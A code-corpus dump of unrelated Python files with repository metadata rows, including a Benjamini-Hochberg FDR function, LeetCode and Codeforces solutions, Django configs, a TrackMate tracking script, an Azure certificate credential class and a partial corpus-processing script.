            # level=-1 requests Python 2's implicit relative lookup.
            __import__(name, globals(), locals(), [], -1)
        except Exception:
            # BUGFIX: was a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt raised while importing.
            logger.exception('Loading dispatcher {}'.format(name))
    logger.debug('Dispatchers initialized')
__init__()
| [
"dkmaster@dkmon.com"
] | dkmaster@dkmon.com |
c3525d6812dbbab8862d654706e21aef6b24d109 | 5237c643b5ab5df35609a6f90b9dd42c5b8285d6 | /python/discover/stats.py | 10c0289a481663681c3c2a70409b355abfc3a931 | [
"Apache-2.0"
] | permissive | Tesson98/DISCOVER | a89f3d05fbdc50f8652405635c6e30150145af34 | dbb1c3e61bb8dcfdd8f2454eac0fa05ff27a9294 | refs/heads/master | 2023-06-29T21:45:30.108285 | 2021-07-27T15:19:26 | 2021-07-27T16:13:04 | 574,865,196 | 1 | 0 | Apache-2.0 | 2022-12-06T08:42:35 | 2022-12-06T08:42:34 | null | UTF-8 | Python | false | false | 464 | py | import numpy
def false_discovery_rate(p, pi0=1.0):
    """Benjamini-Hochberg adjusted p-values (q-values) for array *p*.

    NaN entries are preserved as NaN in the result.  *pi0* is the assumed
    proportion of true null hypotheses (1.0 = classic BH).
    """
    if not 0 <= pi0 <= 1:
        raise ValueError("Invalid value for pi0: %s. Legal values are between 0 and 1" % pi0)
    valid = ~numpy.isnan(p)
    result = numpy.full_like(p, numpy.nan)
    pvals = p[valid]
    n = len(pvals)
    # Walk the p-values from largest to smallest, scaling each by n/rank,
    # and keep a running minimum so q-values are monotone (capped at 1).
    order = pvals.argsort()[::-1]
    ranks = numpy.arange(n, 0, -1)
    scaled = float(pi0) * n / ranks * pvals[order]
    adjusted = numpy.minimum(1, numpy.minimum.accumulate(scaled))
    # Undo the sort so q-values line up with the original positions.
    result[valid] = adjusted[order.argsort()]
    return result
| [
"s.canisius@nki.nl"
] | s.canisius@nki.nl |
875e902874cd19eed9179c2b9f5951774b7ebdd3 | 083ca3df7dba08779976d02d848315f85c45bf75 | /ZumaGame2.py | 0233172d4172027141b217916e5abb0e6ac474f9 | [] | no_license | jiangshen95/UbuntuLeetCode | 6427ce4dc8d9f0f6e74475faced1bcaaa9fc9f94 | fa02b469344cf7c82510249fba9aa59ae0cb4cc0 | refs/heads/master | 2021-05-07T02:04:47.215580 | 2020-06-11T02:33:35 | 2020-06-11T02:33:35 | 110,397,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,067 | py | class Solution:
def findMinStep(self, board: str, hand: str) -> int:
def removeConsecutive(b):
j = 0
for i in range(len(b) + 1):
if i < len(b) and b[i] == b[j]:
continue
if i - j >= 3:
return removeConsecutive(b[: j] + b[i:])
j = i
return b
board = removeConsecutive(board)
if not board:
return 0
result = 100
s = set()
for i in range(len(hand)):
if hand[i] in s:
continue
s.add(hand[i])
for j in range(len(board)):
if board[j] == hand[i]:
t = self.findMinStep(board[: j] + hand[i] + board[j:], hand[:i] + hand[i + 1:])
if t != -1:
result = min(result, t + 1)
return -1 if result == 100 else result
if __name__ == '__main__':
    # Read the board and the hand from stdin, then print the minimum number
    # of hand balls needed to clear the board (-1 if impossible).
    board = input()
    hand = input()
    solution = Solution()
    print(solution.findMinStep(board, hand))
| [
"jiangshen95@163.com"
] | jiangshen95@163.com |
d733b2d6bddf7049ffe24aa8556a7dc547af30e1 | fcdb6c042b6121034c39081e58048c72d4143d0c | /Python/92A/solve.py | e153f19ed6d639d42cfe805627b27edfa4007da8 | [] | no_license | s0nerik/CodeForces | 71ee927782c445aaa66f01474001315f18c7d300 | 5a8283d52e137567637103f30ac09e107f83994b | refs/heads/master | 2021-01-02T09:19:54.833638 | 2014-02-09T16:38:32 | 2014-02-09T16:38:32 | 11,886,506 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | import sys
my_file = sys.stdin
#my_file = open("input.txt", "r")
line = list(map(int, my_file.readline().split()))
n, m = line[0], line[1]
def rec_check():
    """Reduce global ``m`` to what remains after repeatedly paying 1, 2, ..., n.

    Equivalent to the original recursive version (subtract one full round
    of 1+2+...+n while affordable, then one partial round), but iterative
    and O(n): the original recursed once per full round and overflowed
    Python's recursion limit for large m.
    """
    global m
    if n == 1:
        # A single recipient consumes everything.
        m = 0
        return
    # Skip all complete rounds at once with a single modulo.
    m %= n * (n + 1) // 2
    # One partial round: hand out 1, 2, ... while we can still afford it.
    for i in range(1, n + 1):
        if m < i:
            break
        m -= i
rec_check()
print(m) | [
"sonerik@mail.ua"
] | sonerik@mail.ua |
97dc49eb077364d8a6342c2028d34a7ce6019fd5 | 043f2020671bd4d56d655fe43dd8ab636f2c328c | /jazz/migrations.jic/0026_auto_20200607_1348.py | f98fe97537b5a0ddd469405919c479ed4f26490b | [] | no_license | shobberlyridge/newjazz | 8b041182a5e2233f04f039aa13e5bf58cdfca939 | 716429c49e618e10e1e7b738b6f6fa1579816c5d | refs/heads/master | 2022-12-29T14:07:52.509446 | 2020-10-09T12:41:35 | 2020-10-09T12:41:35 | 291,448,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 515 | py | # Generated by Django 2.2.2 on 2020-06-07 12:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Make Player.lineup optional: the FK becomes blank/nullable and is set
    to NULL when the referenced Lineup is deleted."""

    dependencies = [
        ('jazz', '0025_auto_20200607_1347'),
    ]

    operations = [
        migrations.AlterField(
            model_name='player',
            name='lineup',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='toLineups', to='jazz.Lineup'),
        ),
    ]
| [
"edward@albany.me.uk"
] | edward@albany.me.uk |
94198ce8d21c25fcef5db54c4eed46f5b30d96de | ba1943ec012bda4c6c3e4d1c2002dc810949bbd7 | /django_project/urls.py | 0a268102048b5bd1784329c19586fb3ea74667e1 | [] | no_license | yadukrishnan369/firstproject | b7fdeea77effad8b966f63bc789820cefe14c0e7 | 8215c97b383823a3717e00556b321d27828ef8fc | refs/heads/master | 2023-08-12T16:13:55.054020 | 2021-09-28T04:38:27 | 2021-09-28T04:38:27 | 409,837,480 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | """django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
# Project URLconf: the admin site plus everything under application1/
# delegated to that app's own urls module.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('application1/',include('application1.urls')),
]
| [
"yadukrish9656@gmail.com"
] | yadukrish9656@gmail.com |
d99ef0c51a5775993c6889109ec598b5b4d1e799 | b30871b60dab980d8f498e5cfcc16db4f5b0002f | /test/tst_scalarvar.py | ef6603cf23812b009f03c6953138a162da89207c | [
"MIT"
] | permissive | mathause/netCDF4p | e80e2beb1156f0e0142aa5c0875a408dacb8bd51 | 2f1a58dca482b00003e809e422233e95439e986e | refs/heads/master | 2021-01-25T07:18:59.982500 | 2018-02-26T14:13:15 | 2018-02-26T14:13:15 | 28,077,641 | 0 | 0 | null | 2015-06-23T20:54:33 | 2014-12-16T08:28:39 | Python | UTF-8 | Python | false | false | 1,814 | py | import sys
import unittest
import os
import tempfile
import numpy as NP
from numpy.testing import assert_almost_equal
import netCDF4p as netCDF4
import math
VAR_NAME='temp'
VAR_TYPE='f4'
VAR_VAL=math.pi
FILE_NAME = tempfile.mktemp(".nc")
GROUP_NAME = 'subgroup'
# test scalar variable creation and retrieval.
class ScalarVariableTestCase(unittest.TestCase):
    """Round-trip test for dimensionless (scalar) netCDF variables, both in
    the root group and in a subgroup."""

    def setUp(self):
        # Write one scalar variable into the root group and one into a
        # subgroup, exercising both write APIs (assignValue and slicing).
        self.file = FILE_NAME
        rootgrp = netCDF4.Dataset(self.file, 'w')
        # scalar variable.
        temp = rootgrp.createVariable(VAR_NAME,VAR_TYPE)
        #temp[:] = VAR_VAL
        temp.assignValue(VAR_VAL)
        subgroup = rootgrp.createGroup(GROUP_NAME)
        tempg = subgroup.createVariable(VAR_NAME,VAR_TYPE)
        tempg[:] = VAR_VAL
        #tempg.assignValue(VAR_VAL)
        rootgrp.close()

    def tearDown(self):
        # Remove the temporary file
        os.remove(self.file)

    def runTest(self):
        """testing scalar variables"""
        # check dimensions in root group.
        f = netCDF4.Dataset(self.file, 'r+')
        v = f.variables[VAR_NAME]
        # dimensions and shape should be empty tuples
        self.assertTrue(v.dimensions == ())
        self.assertTrue(v.shape == ())
        # check result of getValue and slice
        assert_almost_equal(v.getValue(), VAR_VAL, decimal=6)
        assert_almost_equal(v[:], VAR_VAL, decimal=6)
        g = f.groups[GROUP_NAME]
        vg = g.variables[VAR_NAME]
        # dimensions and shape should be empty tuples
        self.assertTrue(vg.dimensions == ())
        self.assertTrue(vg.shape == ())
        # check result of getValue and slice
        assert_almost_equal(vg.getValue(), VAR_VAL, decimal=6)
        assert_almost_equal(vg[:], VAR_VAL, decimal=6)
        f.close()
if __name__ == '__main__':
unittest.main()
| [
"mathias.hauser@env.ethz.ch"
] | mathias.hauser@env.ethz.ch |
c435ea2aed2ef69cd170ec050fa5852bc81317e1 | 79d078df94172f405739a9813f749ba9a30f144b | /week4/lecture 4.py | ac7e19154913e3a6aa3604b3879b527de4ec9c6c | [] | no_license | workinDead/Financial-Intelligence | 8300823cb3169125bcc198de8b65c1e611bc12df | a6daa85105904dea4863fc2efffa421c19900116 | refs/heads/master | 2020-07-28T21:11:47.193482 | 2019-09-19T11:43:33 | 2019-09-19T11:43:33 | 209,538,326 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,556 | py | #*********************************************#
#
# Review one Issue in Lecture 3
#
#*********************************************#
import numpy as np
import pandas as pd
from pandas import Series, DataFrame
alist = [1,2,3]
# List comprehension: clip every element greater than 2 down to 0.
result = [(0 if c>2 else c) for c in alist]
print("alist:\n",result)
# Equivalent explicit loop, for comparison with the comprehension above.
nlist = []
for c in alist:
    if c > 2 :
        nlist.append(0)
    else:
        nlist.append(c)
print(nlist)
arr = np.array([1,2,3])
result = [(0 if c>2 else c) for c in arr]
print("arr-to-list:\n",result)
arr = np.array([[1,2,3],[2,3,4]])
# Flatten a 2-D array through a nested comprehension, then restore the shape.
result =[(0 if c > 2 else c) for t in arr for c in t]
print(result)
result = np.reshape(result,(2,3))
print(result)
# np.where does the same clipping vectorized, without leaving NumPy.
print(np.where(arr > 2, 0, arr))
#*********************************************#
#
#    Pandas - DataFrame
#
#*********************************************#
data = {'state': ['Ohio', 'Ohio', 'Ohio', 'Nevada', 'Nevada'], 'year': [2000, 2001, 2002, 2001, 2002],
        'pop': [1.5, 1.7, 3.6, 2.4, 2.9]}
frame = DataFrame(data)
print(frame)
print(DataFrame(data, columns=['year','state','pop']))
print(DataFrame(data, columns=['year','state','pop','debt'])) # debt doesn't exist
# A column in a DataFrame can be retrieved as a Series either by dict-like notation or by attribute:
print(frame.columns)
print(frame['state'])
print(frame.state)
print(frame)
#Rows can also be retrieved by position or name by a couple of methods, such as the ix indexing field
# NOTE(review): DataFrame.ix was removed in pandas 1.0 — use .loc/.iloc on a
# modern pandas.
print(frame.ix[3])
frame['debt'] = 16.5
print(frame)
# For example, the empty 'debt' column could be assigned a scalar value or an array of values
frame['debt'] = np.arange(5.)
print(frame)
# When assigning lists or arrays to a column, the value's length must match the length of the DataFrame.
# If you assign a Series, it will be instead conformed exactly to the DataFrame's index, inserting missing values in any holes:
val = Series([-1.2, -1.5, -1.7], index=[2, 4, 5])
frame['debt'] = val
print(frame)
#Assigning a column that doesn't exist will create a new column.
frame['eastern'] = 1
print(frame)
frame['marks'] = frame.state == 'Ohio' # boolean column: True where state is Ohio
del frame['eastern']
print(frame)
# Index Objects
obj = Series(range(3), index=['a', 'b', 'c'])
print(obj)
# Index objects are immutable index[1] = 'd'
# Reindexing
# Calling reindex on this Series rearranges the data according to the new index,
# introducing missing values if any index values were not already present:
obj2 = obj.reindex(['a', 'b', 'c', 'd', 'e'])
print(obj2)
obj2 = obj.reindex(['a', 'b', 'c', 'd', 'e'], fill_value=0)
print(obj2)
# For ordered data like time series, it may be desirable to do some interpolation or filling of values when reindexing.
# The method option allows us to do this, using a method such as ffill which forward fills the values:
obj3 = Series(['blue', 'purple', 'yellow'], index=[0, 2, 4])
print (obj3)
obj3 = obj3.reindex(range(6), method='ffill')
print(obj3)
# ffill or pad : Fill (or carry) values forward, bfill or backfill : Fill (or carry) values backward
# With DataFrame, reindex can alter either the (row) index, columns, or both.
frame = DataFrame(np.arange(9).reshape((3, 3)), index=['a', 'c', 'd'], columns=['Ohio', 'Texas', 'California'])
print(frame)
# When passed just a sequence, the rows are reindexed in the result:
frame2 = frame.reindex(['a', 'b', 'c', 'd'])
print(frame2)
# The columns can be reindexed using the columns keyword:
states = ['Texas', 'Utah', 'California']
frame = frame.reindex(columns=states)
print(frame)
# Both can be reindexed in one shot, though interpolation will only apply row-wise(axis 0)
# NOTE(review): combining method= with columns= in a single reindex raises in
# recent pandas versions; split into two calls if this breaks.
frame = frame.reindex(index=['a', 'b', 'c', 'd'], method='ffill', columns=states)
print(frame)
# Dropping entries from an axis
obj = Series(np.arange(5.), index=['a', 'b', 'c', 'd', 'e'])
new_obj = obj.drop('c')
print(new_obj)
# With DataFrame, index values can be deleted from either axis:
data = DataFrame(np.arange(16).reshape((4, 4)), index=['Ohio', 'Colorado', 'Utah', 'New York'], columns=['one', 'two', 'three', 'four'])
# print(data)
# for i in data.items():
#     print("items in data \n",i)
# NOTE(review): drop() returns a new object — the two calls below do NOT
# modify `data`, so the following print() statements show it unchanged.
data.drop(['Colorado', 'Ohio'])
print(data)
data.drop('two', axis=1)
print(data)
# Summarizing and Computing Descriptive Statistics
print(data.describe())
print(data.sum())
print(data.sum(axis =1 ))
# NOTE(review): the existing row label is 'Ohio' (capital O); assigning to
# "ohio" adds a NEW all-None row rather than clearing a row — confirm intent.
data.ix["ohio"] = None
print(data)
data1 = data.mean(axis=0, skipna=True)
print(data1)
#like idxmin and idxmax, return indirect statistics like the index value where the minimum or maximum values are attained:
print("idmax = \n",data.idxmax())
| [
"whole9681@gmail.com"
] | whole9681@gmail.com |
254b657a7c6193ccc61dad8b6f22843933c85cf8 | 315e513f4f7cd9f624b9ceb030fc451518387f8b | /threads/semaphore.py | 4f6965e95ed743b9900de976ae0cbe652d1d0e8c | [] | no_license | dmcyang163/test | 7f27aa97bd97411583d55e6f2a88ad79c67f6d40 | 5e4f9d5920eadfbd00ad8d70f380e5b8e1cbe679 | refs/heads/master | 2020-04-05T23:27:23.257017 | 2014-08-17T09:05:01 | 2014-08-17T09:05:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 952 | py | # encoding: UTF-8
import threading
import time
# 计数器初值为2
semaphore = threading.Semaphore(2)
# Worker run by each demo thread: at most two threads can hold the
# semaphore (its counter starts at 2) at any one time.
def func():
    # Acquire the semaphore; on success the counter is decremented, and the
    # call blocks while the counter is 0.
    print '%s acquire semaphore...' % threading.currentThread().getName()
    if semaphore.acquire():
        print '%s get semaphore' % threading.currentThread().getName()
        time.sleep(4)
        # Release the semaphore; the counter is incremented again.
        print '%s release semaphore' % threading.currentThread().getName()
        semaphore.release()
t1 = threading.Thread(target=func)
t2 = threading.Thread(target=func)
t3 = threading.Thread(target=func)
t4 = threading.Thread(target=func)
t1.start()
t2.start()
t3.start()
t4.start()
time.sleep(2)
# 没有获得semaphore的主线程也可以调用release
# 若使用BoundedSemaphore,t4释放semaphore时将抛出异常
print 'MainThread release semaphore without acquire'
semaphore.release() | [
"dmc_yang@163.com"
] | dmc_yang@163.com |
b88def8d0aff40c00545deb95f50859b9e75f440 | ece08566d5909a3135835191faee91be73de15c8 | /sjq_gcn/utils/fulladder.py | 43db2f0f85fece6ea0c3bcdbb4efd648dbdc1960 | [] | no_license | shenjiangqiu/gcn_pymtl | e1c96671ca70d1db22117a2e6b786fef0aebecd8 | ba901ad2a6b8f3ac86c4264daea91f052f999db8 | refs/heads/master | 2023-06-04T16:19:24.721619 | 2021-06-23T15:46:25 | 2021-06-23T15:46:25 | 379,641,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | from . import adder
from pymtl3 import *
class FullAdder(Component):
| [
"jshen2@mtu.edu"
] | jshen2@mtu.edu |
ca0321aca72bd390e64948f0e7f89acf174fef9a | 1d36f1a3c527e364b50cb73d0ce82b5b5db917e6 | /sdk/identity/azure-identity/azure/identity/aio/_credentials/certificate.py | 1b044a24c0e14bee3174e19fcfc646c2d828904f | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | emreyalcin26/azure-sdk-for-python | 08c0a294e49e9c3a77867fb20ded4d97722ea551 | 6927458c7baa5baaf07c3b68ed30f6e517e87c9a | refs/heads/master | 2022-10-17T02:25:23.373789 | 2020-06-12T23:43:40 | 2020-06-12T23:43:40 | 272,001,096 | 1 | 0 | MIT | 2020-06-13T12:06:11 | 2020-06-13T12:06:11 | null | UTF-8 | Python | false | false | 2,745 | py | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from typing import TYPE_CHECKING
from .base import AsyncCredentialBase
from .._internal import AadClient
from ..._internal import CertificateCredentialBase
if TYPE_CHECKING:
from typing import Any
from azure.core.credentials import AccessToken
class CertificateCredential(CertificateCredentialBase, AsyncCredentialBase):
    """Authenticates as a service principal using a certificate.

    :param str tenant_id: ID of the service principal's tenant. Also called its 'directory' ID.
    :param str client_id: the service principal's client ID
    :param str certificate_path: path to a PEM-encoded certificate file including the private key
    :keyword str authority: Authority of an Azure Active Directory endpoint, for example 'login.microsoftonline.com',
          the authority for Azure Public Cloud (which is the default). :class:`~azure.identity.KnownAuthorities`
          defines authorities for other clouds.
    :keyword password: The certificate's password. If a unicode string, it will be encoded as UTF-8. If the certificate
          requires a different encoding, pass appropriately encoded bytes instead.
    :paramtype password: str or bytes
    """

    async def __aenter__(self):
        """Open the credential's transport session and return the credential."""
        await self._client.__aenter__()
        return self

    async def close(self):
        """Close the credential's transport session."""
        await self._client.__aexit__()

    async def get_token(self, *scopes: str, **kwargs: "Any") -> "AccessToken":  # pylint:disable=unused-argument
        """Asynchronously request an access token for `scopes`.

        .. note:: This method is called by Azure SDK clients. It isn't intended for use in application code.

        :param str scopes: desired scopes for the access token. This method requires at least one scope.
        :rtype: :class:`azure.core.credentials.AccessToken`
        :raises ~azure.core.exceptions.ClientAuthenticationError: authentication failed. The error's ``message``
          attribute gives a reason. Any error response from Azure Active Directory is available as the error's
          ``response`` attribute.
        """
        if not scopes:
            raise ValueError("'get_token' requires at least one scope")
        # Serve from the token cache when possible; only hit AAD on a miss.
        token = self._client.get_cached_access_token(scopes, query={"client_id": self._client_id})
        if not token:
            token = await self._client.obtain_token_by_client_certificate(scopes, self._certificate, **kwargs)
        return token

    def _get_auth_client(self, tenant_id, client_id, **kwargs):
        # Factory hook used by CertificateCredentialBase to build the
        # async AAD client this credential talks to.
        return AadClient(tenant_id, client_id, **kwargs)
| [
"noreply@github.com"
] | emreyalcin26.noreply@github.com |
9e21624177893a8afea8146b900298f4c78daefc | 4638713ac25503369f4b7dd7ddeac9baf5f61405 | /Invasionmate.py | 025dbbb0339b8b446ee444e39cd4acfbe87154c4 | [] | no_license | jrijn/IJ_analysis_tool | 0161e91ff0ce9dca269bfb7986ae9e1252017248 | 0a0477dfe99b5b5debc7c60090f9e9b527500d4d | refs/heads/master | 2021-06-24T21:33:23.224904 | 2021-04-23T10:02:37 | 2021-04-23T10:02:37 | 221,932,541 | 0 | 0 | null | 2020-08-25T09:46:02 | 2019-11-15T13:45:35 | Python | UTF-8 | Python | false | false | 5,072 | py | from ij import IJ, WindowManager
from fiji.plugin.trackmate import Model
from fiji.plugin.trackmate import Settings
from fiji.plugin.trackmate import TrackMate
from fiji.plugin.trackmate import SelectionModel
from fiji.plugin.trackmate import Logger
from fiji.plugin.trackmate.detection import LogDetectorFactory
from fiji.plugin.trackmate.tracking.sparselap import SparseLAPTrackerFactory
from fiji.plugin.trackmate.tracking import LAPUtils
from ij import IJ
import fiji.plugin.trackmate.visualization.hyperstack.HyperStackDisplayer as HyperStackDisplayer
import fiji.plugin.trackmate.features.FeatureFilter as FeatureFilter
# BUGFIX: these two spot-analyzer factories are instantiated in the settings
# section below but were never imported, so the script died with a NameError.
import fiji.plugin.trackmate.features.spot.SpotIntensityAnalyzerFactory as SpotIntensityAnalyzerFactory
import fiji.plugin.trackmate.features.spot.SpotContrastAndSNRAnalyzerFactory as SpotContrastAndSNRAnalyzerFactory
import sys
import fiji.plugin.trackmate.features.track.TrackDurationAnalyzer as TrackDurationAnalyzer
# Get currently selected image
# imp = WindowManager.getCurrentImage()
# For reproducibility this demo loads the Fiji sample stack instead of the
# active window (the commented line above is the interactive alternative).
imp = IJ.openImage('http://fiji.sc/samples/FakeTracks.tif')
imp.show()
# ----------------------------
# Create the model object now
# ----------------------------
# Some of the parameters we configure below need to have
# a reference to the model at creation. So we create an
# empty model now.
model = Model()
# Send all messages to ImageJ log window.
model.setLogger(Logger.IJ_LOGGER)
# ------------------------
# Prepare settings object
# ------------------------
settings = Settings()
settings.setFrom(imp)
# Configure detector - We use the Strings for the keys
settings.detectorFactory = LogDetectorFactory()
settings.detectorSettings = {
    'DO_SUBPIXEL_LOCALIZATION': True,
    'RADIUS': 2.5,
    'TARGET_CHANNEL': 1,
    'THRESHOLD': 0.,
    'DO_MEDIAN_FILTERING': False,
}
# Configure spot filters - Classical filter on quality
# filter1 = FeatureFilter('QUALITY', 30, True)
# settings.addSpotFilter(filter1)
# Configure tracker - We want to allow merges and fusions
settings.trackerFactory = SparseLAPTrackerFactory()
settings.trackerSettings = LAPUtils.getDefaultLAPSettingsMap()  # almost good enough
# BUGFIX: the key was misspelled 'LINGKING_MAX_DISTANCE', so the intended
# 10.0 linking distance never reached the tracker (TrackMate's key is
# 'LINKING_MAX_DISTANCE').
settings.trackerSettings['LINKING_MAX_DISTANCE'] = 10.0
settings.trackerSettings['GAP_CLOSING_MAX_DISTANCE'] = 10.0
settings.trackerSettings['MAX_FRAME_GAP'] = 240
settings.trackerSettings['ALLOW_TRACK_SPLITTING'] = True
settings.trackerSettings['ALLOW_TRACK_MERGING'] = True
# Add the analyzers for some spot features.
# You need to configure TrackMate with analyzers that will generate
# the data you need.
# Here we just add two analyzers for spot, one that computes generic
# pixel intensity statistics (mean, max, etc...) and one that computes
# an estimate of each spot's SNR.
# The trick here is that the second one requires the first one to be in
# place. Be aware of this kind of gotchas, and read the docs.
settings.addSpotAnalyzerFactory(SpotIntensityAnalyzerFactory())
settings.addSpotAnalyzerFactory(SpotContrastAndSNRAnalyzerFactory())
# Configure track analyzers - Later on we want to filter out tracks
# based on their displacement, so we need to state that we want
# track displacement to be calculated. By default, out of the GUI,
# not features are calculated.
# The displacement feature is provided by the TrackDurationAnalyzer.
settings.addTrackAnalyzer(TrackDurationAnalyzer())
# Configure track filters - We want to get rid of the two immobile spots at
# the bottom right of the image. Track displacement must be above 10 pixels.
filter2 = FeatureFilter('TRACK_DISPLACEMENT', 10, True)
settings.addTrackFilter(filter2)
# -------------------
# Instantiate plugin
# -------------------
trackmate = TrackMate(model, settings)
# --------
# Process
# --------
# checkInput()/process() return False on failure; the reason is then
# available via getErrorMessage().
ok = trackmate.checkInput()
if not ok:
    sys.exit(str(trackmate.getErrorMessage()))
ok = trackmate.process()
if not ok:
    sys.exit(str(trackmate.getErrorMessage()))
# ----------------
# Display results
# ----------------
model.getLogger().log('Found ' + str(model.getTrackModel().nTracks(True)) + ' tracks.')
selectionModel = SelectionModel(model)
displayer = HyperStackDisplayer(model, selectionModel, imp)
displayer.render()
displayer.refresh()
# Echo results with the logger we set at start:
# model.getLogger().log(str(model))
# The feature model, that stores edge and track features.
fm = model.getFeatureModel()
# NOTE(review): `id` shadows the Python builtin; harmless here but worth
# renaming if this loop grows.
for id in model.getTrackModel().trackIDs(True):
    # Fetch the track feature from the feature model.
    v = fm.getTrackFeature(id, 'TRACK_MEAN_SPEED')
    model.getLogger().log('')
    model.getLogger().log(
        'Track ' + str(id) + ': mean velocity = ' + str(v) + ' ' + model.getSpaceUnits() + '/' + model.getTimeUnits())
    track = model.getTrackModel().trackSpots(id)
    for spot in track:
        sid = spot.ID()
        # Fetch spot features directly from spot.
        x = spot.getFeature('POSITION_X')
        y = spot.getFeature('POSITION_Y')
        t = spot.getFeature('FRAME')
        q = spot.getFeature('QUALITY')
        snr = spot.getFeature('SNR')
        mean = spot.getFeature('MEAN_INTENSITY')
        model.getLogger().log(
            '\tspot ID = ' + str(sid) + ': x=' + str(x) + ', y=' + str(y) + ', t=' + str(t) + ', q=' + str(
                q) + ', snr=' + str(snr) + ', mean = ' + str(mean))
| [
"jorik.vanrijn@gmail.com"
] | jorik.vanrijn@gmail.com |
aa3cad735dc9453629e4cb87982cd2dc96c5743e | 32cb84dd41e4be24c065bb205f226f9b121a6db2 | /antiddos/policy.py | eea1a79695c59d373b35ac96a1b19ba7d74d6620 | [] | no_license | InformatykaNaStart/staszic-sio2 | b38fda84bd8908472edb2097774838ceed08fcfa | 60a127e687ef8216d2ba53f9f03cfaa201c59e26 | refs/heads/master | 2022-06-29T11:09:28.765166 | 2022-06-13T21:56:19 | 2022-06-13T21:56:19 | 115,637,960 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | from oioioi.evalmgr.models import QueuedJob
from django.conf import settings
def queued_submissions_of(user):
    """Number of *user*'s submissions still WAITING in the evaluation queue."""
    return QueuedJob.objects.filter(state='WAITING',submission__user=user).count()
def get_queued_submissions_limit():
    """Per-user cap on waiting submissions (settings override, default 1000)."""
    return getattr(settings, 'MAX_QUEUED_SUBMISSIONS_PER_USER', 10**3)
def can_submit(user):
    """Allow a new submission unless the user already has too many queued.

    Superusers bypass the limit entirely.
    """
    if user.is_superuser: return True
    return queued_submissions_of(user) < get_queued_submissions_limit()
| [
"hugo@staszic.waw.pl"
] | hugo@staszic.waw.pl |
9398c18330db53a85c1938ebce7874076d6a6f55 | c617c372853c145055b652ef8fb75591abdb78c8 | /bloggers/admin.py | 40ec799e2081493dd081f148ee89e6a60c16f828 | [] | no_license | vladrashkevich/Myproject | 158de08546d098c2f7144341f61da1e51ad05d17 | d312025c782baf43b4adb6893f1a03b7f8c59145 | refs/heads/master | 2023-08-24T20:25:16.734975 | 2021-09-23T04:51:25 | 2021-09-23T04:51:25 | 404,774,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | from django.contrib import admin
from .models import *
class BloggersAdmin(admin.ModelAdmin):
    """Admin list/search configuration for Bloggers posts; the slug is
    pre-filled from the title."""
    list_display = ('id', 'title', 'time_create', 'photo', 'is_published')
    list_display_links = ('id', 'title')
    search_fields = ('title', 'content')
    list_editable = ('is_published',)
    list_filter = ('is_published', 'time_create')
    prepopulated_fields = {'slug': ('title',)}
class CategoryAdmin(admin.ModelAdmin):
    """Admin configuration for categories; the slug is pre-filled from the
    name."""
    list_display = ('id', 'name')
    list_display_links = ('id', 'name')
    search_fields = ('name',)
    prepopulated_fields = {'slug': ('name',)}
admin.site.register(Bloggers, BloggersAdmin)
admin.site.register(Category, CategoryAdmin)
| [
"vladrashkevich@mail.ru"
] | vladrashkevich@mail.ru |
c2b9c4e1a0a40e3c55b88feb06af86b10bb8ded9 | ed757d437952d884533dfc845e365f2c5c4714a4 | /test_aho.py | 566a1429256b8524c1965824dcd138f5ff74efae | [
"MIT"
] | permissive | guilhermedelyra/aho-spell_correction | da48d927de4591743df7d47b5e64c8c301db9a79 | e2978c6cda3d35dab2da559e24fe359c3127627f | refs/heads/master | 2020-03-30T17:37:38.672346 | 2018-10-03T18:49:18 | 2018-10-03T18:49:18 | 151,463,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | key = ["his", "her", "she", "he", "ka"]
text = "hishers kaka"  # haystack scanned for the patterns in `key`
import aho  # project-local Aho-Corasick implementation
# Search the text for every pattern at once and print the matches.
z = aho.search(key, text)
print(z)
| [
"guilyra12@gmail.com"
] | guilyra12@gmail.com |
907eb0f09b9234d3d0e14374b2d3e65fe6bf9c63 | f4077ccd3eccf74151115e9ff71bf3dcbd2e7785 | /process_corpus.py | 253a49c127b18d656da56b4a48c2dc8c8b54edbc | [] | no_license | Celiacaoyanan/Topic_Model | 80a291b7423eeed5119fd5b5bfe618fbd3f780d3 | f3bd3442a22a60a8a92de9a199daa1fefa5f4cdd | refs/heads/master | 2021-01-11T02:19:16.456827 | 2019-02-20T01:10:13 | 2019-02-20T01:10:13 | 70,982,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,989 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
process_corpus_1 is used to process corpus where there are contents after a colon and change them to one word every line
Example of one line in raw corpus: 环境科学:环境科学,环科,环境科学,环境
after processed: 环境科学
环科
环境科学
环境
process_corpus_2 is used to combine all the dictionaries into one
"""
import os
import optparse
class Process_Corpus:
    """Turn raw dictionary files into a single one-word-per-line corpus.

    ``process_corpus_1`` expects lines shaped like ``term:alias1,alias2,...``
    and writes every alias on its own line to ``dict_edu1.txt``;
    ``process_corpus_2`` simply concatenates all dictionary files, one
    stripped word per line, into ``dict_edu.txt``.
    """

    def __init__(self, dict_dir):
        # Directory holding the raw dictionary files to process.
